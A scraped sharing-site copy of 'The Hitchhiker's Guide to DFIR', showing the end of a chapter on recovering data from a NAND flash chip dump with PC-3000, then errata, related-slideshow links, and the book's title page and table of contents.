0x0730 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0740 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0750 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0760 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0770 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0780 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0790 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0800 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0810 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0820 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0830 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
You can see well that after 512 bytes of data there are 16 bytes of service area and you see that there
are 4 sectors in a page.
These 512 + 16 bytes result in the 528 bytes per sector previously recognized by ECC. To do the split
manually, can right-click the Page entry in the Tree tab and use Divide proportionally from the
context-menu. This will open the following window:
12.52 - Divide page proportionally
Then enter 4 that the page gets divided into 4 sectors and confirm this with Apply. After that the
program asks, if you want to allocate the parts to the sectors definition:
Chapter 12 - Data recovery 271
12.53 - Add parts to sectors dialog
Confirm this with Yes and you get 4 sectors of 528 bytes each…
To divide these sectors into data and service area, right-click on the range entry and select Divide
from context-menu:
12.54 - Divide sectors in DA and SA
Then enter the length of the data area in bytes and confirm this with Apply:
12.55 - Sector length
Once you have done this for all sectors, the page conversion looks like this:
Chapter 12 - Data recovery 272
12.56 - Finished page conversion
A page conversion would not even have been necessary for this example but this rather manageable
page conversion was ideal to show the process…
Click on the down arrow next to the play button in the toolbar and then on Apply to add the page
conversion to the transformation graph
12.57 - Apply page conversion
… and the following message appears:
Chapter 12 - Data recovery 273
12.58 - Transformation successful messagebox
Confirm that with OK and you find in transformation graph another line:
12.59 - Transformation graph with newly added page conversion
The transformation graph is basically a list of all the conversion steps that are applied to the dump.
In order to get the data in the right order, you have two main options:
• Block number in which a part within the service area is used to bring the data in the correct
order and the use of a
• Translator, which is the newer and more complex method to bring the data in the right order!
To see if you are dealing with a block number algorithm, you can look at the service information
of all sectors. To do this, you right-click on item 0 in the second line of the transformation graph
(Page conversion) and select Service information from the context-menu.
After that, you will see the following window:
Chapter 12 - Data recovery 274
12.60 - Service informations top sectors
Here you see in each line the 16 bytes of the service area of all sectors.
Since in a block number algorithm the numbering of the blocks is at the beginning of the service
area, you scroll through the data.
While the rear data is constantly changing, you only see the value 0x00 on the first 6 bytes.
So, I scroll down a little bit further and I see the following:
12.61 - Service informations later sectors
Here again the first 6 bytes remain the same and the other 10 bytes are constantly changing.
Chapter 12 - Data recovery 275
12.62 - Service informations top sectors
A bit further down you see the same picture. If you pay close attention to the transition from block
00138 to 00138, you see that with the block, the first few bytes also change.
So, you clearly have a pendrive that works based on one of the block number algorithms. Which
exactly, you can determine by research or with the trial-and-error method.
You can also use the Solution Center for research. To do so, right-click on the headline Chips in the
left pane and select Search solution from the context-menu. The solutions will be searched based
on the controller model you entered when creating the case and the ID read from the chip.
I want to demonstrate the trial-and-error approach here.
To do this, right-click again on the item 0 in the last line in the transformation graph and then
select Data analysis -> Block number -> Block number (Type 1) [0x0000]:
Chapter 12 - Data recovery 276
12.63 - Try block number 0000
The Type 1 algorithm [0x0000] is usually quite universal and my first choice. Type 2 is for a
different controller and Type 4 would be for a Kingston SD card – so you can exclude that in this
example.
If Type 1 doesn’t fit, you can try Type 5, Type 7 and Type 9 …
As soon as you click on the entry for Type 1, you see the following window:
Chapter 12 - Data recovery 277
12.64 - Block number type 0000 dialog
Here activate the checkbox Autodetect for the first attempt and start the process. Then you see the
following output in the log tab:
[05.09.2022 11:09:25]: Applying method : Block number (Type 1) [0x0000]...
[05.09.2022 11:09:26]: Algorithm parameters autodetection... Block size detection
[05.09.2022 11:09:28]: Shift of marker within sector: 512 Calculated value of block 
size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Shift of marker within sector: 513 Calculated value of block 
size: 0256 Probability: 318464 Mask: Undefined! Identifier structure: Undefined! V
ariant is not correct and removed from analysis
[05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block 
size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Variants of marker position::
[05.09.2022 11:09:29]: Shift of marker within sector: 512 Calculated value of block 
size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block 
size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Try other parameters in case of bad result .
[05.09.2022 11:09:29]: The following parameters will be applied:
[05.09.2022 11:09:29]: Marker position............. 512
[05.09.2022 11:09:29]: Block Size (in sectors)..... 256
[05.09.2022 11:09:29]: Shift of the analysis start. 0
[05.09.2022 11:09:29]: Mask........................ 0xFFFF
Chapter 12 - Data recovery 278
[05.09.2022 11:09:29]: Identifier structure........ 1234
[05.09.2022 11:09:29]: Blocks integrity testing.... No
[05.09.2022 11:09:29]: Blocks within the bounds of bank..... NO
[05.09.2022 11:09:29]: Page Size................... 8
[05.09.2022 11:09:29]: Sector number for getting marker value(The main passage): 0
[05.09.2022 11:09:29]: Sector number for getting marker value(Additional passage): 0
[05.09.2022 11:09:29]: Direct Image Building NO
[05.09.2022 11:09:29]: Skip Block Empty first page YES
[05.09.2022 11:09:29]: Special ConditionUse marker from 0 addon NO
[05.09.2022 11:09:29]: Marker analysis. Allocation by banks.
[05.09.2022 11:09:29]: Bank size 512 -> Value adjusted.
[05.09.2022 11:09:29]: Bank 00 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 01 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 02 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 03 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 04 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 05 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 06 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 07 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: -------------------------------------------------------------
---
[05.09.2022 11:09:29]: Shaped banks and boundaries
[05.09.2022 11:09:29]: Bank: 000 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000000000 - 000131071
[05.09.2022 11:09:29]: Bank: 001 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000131072 - 000262143
[05.09.2022 11:09:29]: Bank: 002 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000262144 - 000393215
[05.09.2022 11:09:29]: Bank: 003 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000393216 - 000524287
[05.09.2022 11:09:29]: Bank: 004 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000524288 - 000655359
[05.09.2022 11:09:29]: Bank: 005 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000655360 - 000786431
[05.09.2022 11:09:29]: Bank: 006 ( Number of blocks: 00512 (0x 200) )-> Range of sec
tors: 000786432 - 000917503
[05.09.2022 11:09:29]: Bank: 007 ( Number of blocks: 00511 (0x 1FF) )-> Range of sec
tors: 000917504 - 001048319
[05.09.2022 11:09:29]: -------------------------------------------------------------
---
[05.09.2022 11:09:29]: Partition header is not correct! It's recommended to use Vers
ion table and Quick disk analysis
[05.09.2022 11:09:29]: Duration : 00:00:04
Chapter 12 - Data recovery 279
Sector was read successfully
Apparently, the process worked – so check the result:
12.65 - Context-menu -> View first sector
You can see here immediately, if you click on the new entry in the Folders pane, that the result does
not work.
Instead of offering a filesystem, the entry is not extendable!
This indicates the wrong block number algorithm or the wrong parameters. Before I try other
parameters, I try the other algorithms!
If you right-click on the result, you can see with View the first sector that this sector cannot
possibly be the MBR:
Chapter 12 - Data recovery 280
12.66 - First sector of block number result
You don’t have a valid partition table, nothing that looks like a bootloader, and no 0x55AA as MBR
signature in the last 2 bytes.
You can remove the unusable result of Type 1 with a right-click and the option Delete.
After that, I try Type 5 as usual with the Autodetect option first. However, this provides the following
error in the log tab:
[05.09.2022 11:12:57]: Applying method : Block Number (Type 5) [0x1001]...
[05.09.2022 11:12:57]: Autodetection is impossible. Write parameters manually!
[2022-09-05 11:13:47]: Duration : 00:00:50
[05.09.2022 11:13:47]: Either errors occurred during recovery, or the process was in
terrupted.
There is also a messagebox showing you that the process failed, which offers you to delete the failed
result right away:
Chapter 12 - Data recovery 281
12.67 - Block number algotythm failed message
Therefore I call again the dialog for Type 5 and remove the checkmark for Autodetect:
12.68 - Block number type 5 with default values
I leave the marker position at 512 bytes. This is also consistent with what you saw in Page designer.
For Block size in sectors, I leave the proposed 256 sectors. However, you can easily confirm this
by viewing the service information:
Chapter 12 - Data recovery 282
12.69 - Service informations
Here you see the boundary between block 0 and block 1 (B = block). Block 0 consists of pages 0x00
– 0x3F (P = Pages). With this information you can use the Python shell to calculate:
0x00 until 0x3F are in hexadecimal notation 0x40 pages:
>>> 0x40*4
255
So, you have the sectors 0 – 255 in block 0. This confirms the 256 sectors per block.
As soon as you use these values to build a virtual block-device with the Apply-button, you see the
following messages in the log tab:
[05.09.2022 11:14:34]: Applying method : Block Number (Type 5) [0x1001]...
[05.09.2022 11:14:35]: The following parameters will be applied:
[05.09.2022 11:14:35]: Marker position............. 512
[05.09.2022 11:14:35]: Block Size (in sectors)..... 256
[05.09.2022 11:14:35]: Only even blocks............ No
[2022-09-05 11:14:50]: Duration : 00:00:15
This time you can expand the entry for Type 5:
Chapter 12 - Data recovery 283
12.70 - Block number type 5 working
We can also see based on the green dots that the JPG files are valid based on the structure check of
PC-3000.
If you want to view one of the images, you can right-click on the filename to open the context-
menu and then select the entry Open. Here, the standard program, which is set in Windows for the
respective file type, is used to open the file.
Of course, you can also back up the data:
12.71 - Save user data
To do this, I set the check mark on the folder Root (root directory of the partition). Then I right-click
Root in the Folders pane and select Save marked... from the context-menu.
Chapter 12 - Data recovery 284
After that, you only have to specify where the data should be stored and start the process.
Reading the chips is always the same but there may be times when you need to do the de-scrambling
with XOR before the ECC correction.
After successfully assembling a virtual block device you can right-click on Block device (Type 5)
[0x1001] and select Image to file to create a binary image of the partition which you can load
then into a forensics tool of your choice.
A flash chip-off case can get easily more complex:
12.71 - Save user data
Some cases have even more complex transformations then the one shown above! To get good at
this type of data recovery requires time, training and research. This is the reason why I don’t
recommend beginners to start with flash data recovery but with HDDs. The success rate even with
basic knowledge will be much higher.
Errata
Reporting Errata
If you think you’ve found an error relating to spelling, grammar, or anything else that’s currently
holding this book back from being the best it can be, please visit the book’s GitHub repository²⁸² and
create an Issue detailing the error you’ve found. Anyone is also welcome to submit a Pull Request
with new content, fixes, changes, etc.
²⁸²https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues
Changelog
• v1.0²⁸³ - August 15, 2022
• v1.1²⁸⁴ - September 10, 2022
²⁸³https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/
v1.0
²⁸⁴https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/
v1.1

More Related Content

PPTX
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
PDF
Cyber Security Awareness
PDF
IBM QRadar Security Intelligence Overview
PDF
Cyber Security Governance
PPTX
HealthCare Compliance - HIPAA and HITRUST
PDF
Red Team Framework
PPTX
Chapter 11: Information Security Incident Management
PDF
Information Security It's All About Compliance
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Cyber Security Awareness
IBM QRadar Security Intelligence Overview
Cyber Security Governance
HealthCare Compliance - HIPAA and HITRUST
Red Team Framework
Chapter 11: Information Security Incident Management
Information Security It's All About Compliance

What's hot (20)

PPT
Isms awareness training
PPTX
McAfee SIEM solution
PDF
Cyber Threat Intelligence
PPTX
Introduction to PCI DSS
PPTX
Intrusion Prevention System
PPTX
Roadmap to security operations excellence
PPTX
Security Operation Center Fundamental
PPT
Chapter 1 Presentation
PPTX
Security operation center
PPTX
SOC 2 Compliance and Certification
PPTX
Information Security Management System ISO/IEC 27001:2005
PDF
SOC Architecture - Building the NextGen SOC
PPTX
Cyber Security 101: Training, awareness, strategies for small to medium sized...
PPTX
NIST CyberSecurity Framework: An Overview
PDF
NIST Cybersecurity Framework (CSF) 2.0 Workshop
PPTX
IBM Security QRadar
PDF
HITRUST 101: All the basics you need to know
PDF
CISSP Cheatsheet.pdf
PPTX
Soc 2 attestation or ISO 27001 certification - Which is better for organization
Isms awareness training
McAfee SIEM solution
Cyber Threat Intelligence
Introduction to PCI DSS
Intrusion Prevention System
Roadmap to security operations excellence
Security Operation Center Fundamental
Chapter 1 Presentation
Security operation center
SOC 2 Compliance and Certification
Information Security Management System ISO/IEC 27001:2005
SOC Architecture - Building the NextGen SOC
Cyber Security 101: Training, awareness, strategies for small to medium sized...
NIST CyberSecurity Framework: An Overview
NIST Cybersecurity Framework (CSF) 2.0 Workshop
IBM Security QRadar
HITRUST 101: All the basics you need to know
CISSP Cheatsheet.pdf
Soc 2 attestation or ISO 27001 certification - Which is better for organization
Ad

Similar to DFIR (20)

PDF
Laravel 4 Documentation
PDF
WindowsForensicAnalysisLearnyou here.pdf
PDF
The Art of Monitoring (2016).pdf
PDF
The IT Manager's Guide to DevOps
PDF
The Defender's Dilemma
PDF
E views 9 command ref
PDF
Leaving addie for sam field guide guidelines and temst learning experiences
PDF
The road-to-learn-react
PDF
Flutter Apprentice (First Edition) - Learn to Build Cross-Platform Apps.pdf
PDF
Arduino: Empezando con Arduino V2
PDF
Arduino: Crea bots y gadgets Arduino aprendiendo mediante el descubrimiento d...
PDF
Highperformance Buildings A Guide For Owners Managers Robinson
PDF
Struts Live
PDF
Jakarta struts
PDF
Jakarta strutslive
PDF
EloquenFundamentalsof Web Developmentt_JavaScript.pdf
PDF
Eloquent JavaScript Book for Beginners to Learn Javascript
PDF
E views 6 users guide i
PDF
Rprogramming
PDF
Faronics Deep Freeze Server Enterprise User Guide
Laravel 4 Documentation
WindowsForensicAnalysisLearnyou here.pdf
The Art of Monitoring (2016).pdf
The IT Manager's Guide to DevOps
The Defender's Dilemma
E views 9 command ref
Leaving addie for sam field guide guidelines and temst learning experiences
The road-to-learn-react
Flutter Apprentice (First Edition) - Learn to Build Cross-Platform Apps.pdf
Arduino: Empezando con Arduino V2
Arduino: Crea bots y gadgets Arduino aprendiendo mediante el descubrimiento d...
Highperformance Buildings A Guide For Owners Managers Robinson
Struts Live
Jakarta struts
Jakarta strutslive
EloquenFundamentalsof Web Developmentt_JavaScript.pdf
Eloquent JavaScript Book for Beginners to Learn Javascript
E views 6 users guide i
Rprogramming
Faronics Deep Freeze Server Enterprise User Guide
Ad

Recently uploaded (20)

PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
PPTX
Funds Management Learning Material for Beg
PDF
Slides PDF: The World Game (s) Eco Economic Epochs.pdf
PPTX
Power Point - Lesson 3_2.pptx grad school presentation
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
PDF
si manuel quezon at mga nagawa sa bansang pilipinas
PDF
Smart Home Technology for Health Monitoring (www.kiu.ac.ug)
PDF
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
PDF
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
PPTX
1402_iCSC_-_RESTful_Web_APIs_--_Josef_Hammer.pptx
PPT
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
PPTX
newyork.pptxirantrafgshenepalchinachinane
PPTX
SAP Ariba Sourcing PPT for learning material
PDF
Exploring VPS Hosting Trends for SMBs in 2025
PDF
Uptota Investor Deck - Where Africa Meets Blockchain
PPTX
Layers_of_the_Earth_Grade7.pptx class by
PDF
SASE Traffic Flow - ZTNA Connector-1.pdf
PPT
250152213-Excitation-SystemWERRT (1).ppt
PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
PPTX
E -tech empowerment technologies PowerPoint
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
Funds Management Learning Material for Beg
Slides PDF: The World Game (s) Eco Economic Epochs.pdf
Power Point - Lesson 3_2.pptx grad school presentation
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
si manuel quezon at mga nagawa sa bansang pilipinas
Smart Home Technology for Health Monitoring (www.kiu.ac.ug)
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
1402_iCSC_-_RESTful_Web_APIs_--_Josef_Hammer.pptx
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
newyork.pptxirantrafgshenepalchinachinane
SAP Ariba Sourcing PPT for learning material
Exploring VPS Hosting Trends for SMBs in 2025
Uptota Investor Deck - Where Africa Meets Blockchain
Layers_of_the_Earth_Grade7.pptx class by
SASE Traffic Flow - ZTNA Connector-1.pdf
250152213-Excitation-SystemWERRT (1).ppt
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
E -tech empowerment technologies PowerPoint

DFIR

  • 2. The Hitchhiker’s Guide to DFIR: Experiences From Beginners and Experts A crowdsourced Digital Forensics and Incident Response (DFIR) book by the members of the Digital Forensics Discord Server Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John Haynes, Guus Beckers, Barry Grundy, Tristram, Victor Heiland, Jason Wilkins and Mark Berger This book is for sale at http://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts This version was published on 2022-11-28 ISBN 979-8-9863359-0-2 This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing process. Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and many iterations to get reader feedback, pivot until you have the right book and build traction once you do. © 2022 Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John Haynes, Guus Beckers, Barry Grundy, Tristram, Victor Heiland, Jason Wilkins and Mark Berger
  • 3. This book is dedicated to all the practitioners and professionals in the niche of DFIR. It is for all those, beginners and experts alike, who spend sleepless nights expanding their horizons of knowledge in efforts to bring a change, small or big. Happy Sleuthing! :)
  • 4. Contents Authors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Contributors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Chapter 0 - Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Purpose of This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Community Participation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 Final Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Chapter 1 - History of the Digital Forensics Discord Server . . . . . . . . . . . . . . . . . . . . 14 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 Beginnings in IRC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Move to Discord . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Mobile Forensics Discord Server ⇒ Digital Forensics Discord Server . . . . . . . . . . . . . 17 Member Growth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Hosting the 2020 Magnet Virtual Summit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Community Engagement Within the Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Impact on the DFIR community . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 Law Enforcement Personnel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 Forensic 4:cast Awards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Future . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 Chapter 2 - Basic Malware Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Basic Malware Analysis Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 Basic Malware Analysis Walkthrough . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 Analysis Wrap-Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 Chapter 3 - Password Cracking for Beginners . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 Disclaimer & Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 Password Hashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 Useful Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68 Hash Extraction Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
  • 5. CONTENTS Hash Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 Attacking the Hash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 Installing Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 “Brute-Forcing” with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 Hashcat’s Potfile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 Dictionary (Wordlist) Attack with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 Dictionary + Rules with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 Robust Encryption Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 Complex Password Testing with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 Searching a Dictionary for a Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 Generating Custom Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82 Paring Down Custom Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Additional Resources and Advanced Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . 86 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 Chapter 4 - Large Scale Android Application Analysis . . . . . . . . . . . . . . . . . . . . . . . 88 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 Part 1 - Automated Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Part 2 - Manual Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97 Problem of Scale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 Part 3 - Using Autopsy, Jadx, and Python to Scrap and Parse Android Applications at Scale 103 Chapter 5 - De-Obfuscating PowerShell Payloads . . . . . . . . . . . . . . . . . . . . . . . . . . 115 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115 What Are We Dealing With? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116 Stigma of Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 Word of Caution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118 Base64 Encoded Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 Base64 Inline Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121 GZip Compression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 Invoke Operator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 String Reversing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 Replace Chaining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 ASCII Translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129 Wrapping Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 Chapter 6 - Gamification of DFIR: Playing CTFs . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 What is a CTF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 Why am I qualified to talk about CTFs? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 Types of CTFs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134 Evidence Aplenty . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
  • 6. CONTENTS Who’s Hosting? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 Why Play a CTF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 Toss a Coin in the Tip Jar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 Takeaways . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Chapter 7 - The Law Enforcement Digital Forensics Laboratory . . . . . . . . . . . . . . . . . 146 Setting Up and Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 Executive Cooperation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 Physical Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 Selecting Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 Certification and Training . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 Accreditation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152 Chapter 8 - Artifacts as Evidence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Forensic Science . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Types of Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156 What is Parsing? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157 Artifact-Evidence Relation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160 Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170 Chapter 9 - Forensic imaging in a nutshell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171 What is a disk image? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171 Creating a disk image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173 Memory forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177 Next Steps and Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 Chapter 10 - Linux and Digital Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 What is Linux? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 Why Linux for Digital Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182 Choosing Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185 Learning Linux Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189 Linux Forensics in Action . . . . . . . . . . . . . . 